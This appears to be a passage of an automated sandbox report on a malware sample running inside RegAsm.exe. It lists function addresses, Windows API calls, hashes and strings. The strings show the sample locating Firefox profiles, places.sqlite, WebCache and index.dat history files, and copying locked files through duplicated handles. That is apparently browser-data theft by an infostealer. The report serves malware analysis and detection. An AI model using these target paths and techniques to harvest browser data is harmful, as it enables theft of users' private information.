                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                  • API String ID: 1534475566-1174173950
                                                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                  Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 669240632-0
                                                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                  Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                  Strings
                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                  • API String ID: 2925649097-2036018995
                                                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                  • String ID: "%s"
                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2911713577-0
                                                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcmp
                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                  Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModuleProcessTimes
                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                  • API String ID: 116129598-3385500049
                                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  Strings
                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                  • API String ID: 2887208581-2114579845
                                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                  Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??3@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcmp
                                                                                                                                  • String ID: $$8
                                                                                                                                  • API String ID: 1475443563-435121686
                                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1979745280-0
                                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
